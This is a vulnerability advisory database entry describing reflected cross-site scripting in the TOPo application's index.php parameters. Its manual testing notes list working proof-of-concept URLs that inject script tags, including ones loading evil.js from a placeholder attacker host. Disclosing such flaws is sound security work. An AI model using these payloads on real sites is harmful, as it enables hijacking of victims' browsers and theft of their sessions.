TOPo index.php Multiple Variable XSS

2005-05-20T04:29:52
ID OSVDB:16699
Type osvdb
Reporter Lostmon Lords(Lostmon@gmail.com)
Modified 2005-05-20T04:29:52

Description

Vulnerability Description

TOPo contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'm', 's', 'ID', and 't' variables upon submission to the 'index.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

TOPo contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'm', 's', 'ID', and 't' variables upon submission to the 'index.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

http://[victim]/topo/index.php?m=top"><SCRIPT%20src=http://[attacker]/evil.js></script>&s=info&ID=1114815037.2498 http://[victim]/topo/index.php?m=top&s=info&ID=1115946293.3552"><SCRIPT%20src=http://[attacker]/evil.js></SCRIPT>&t=puntuar http://[victim]/topo/index.php?m=top&s=info"><script>alert()</script>&ID=1115946293.3552&t=puntuar http://[victim]/topo/index.php?m=top"><script>alert()</script>&s=info&ID=1115946293.3552&t=puntuar http://[victim]/topo/index.php?m=top&s=info&t=comments&ID=1114815037.2498"><SCRIPT%20src=http://[attacker]/evil.js></script> http://[victim]/topo/index.php?m=top&s=info&t=comments&paso=1&ID=1111068112.7598"><SCRIPT%20src=http://[attacker]/evil.js></script> http://[victim]/topo/index.php?m=members&s=html&t=edit"><SCRIPT%20src=http://[attacker]/evil.js></script>

http://[victim]/topo/index.php?m=top&s=info&t=comments&paso=1&ID=1115946293.3552 (name, web, and email field)

References:

Vendor URL: http://ej3soft.ej3.net/index.php?m=info&s=topo&t=info Security Tracker: 1014016 Secunia Advisory ID:15325 Related OSVDB ID: 16700 Other Advisory URL: http://lostmon.blogspot.com/2005/05/topo-22-multiple-variable-fields-xss.html CVE-2005-1715 Bugtraq ID: 13700 Bugtraq ID: 13701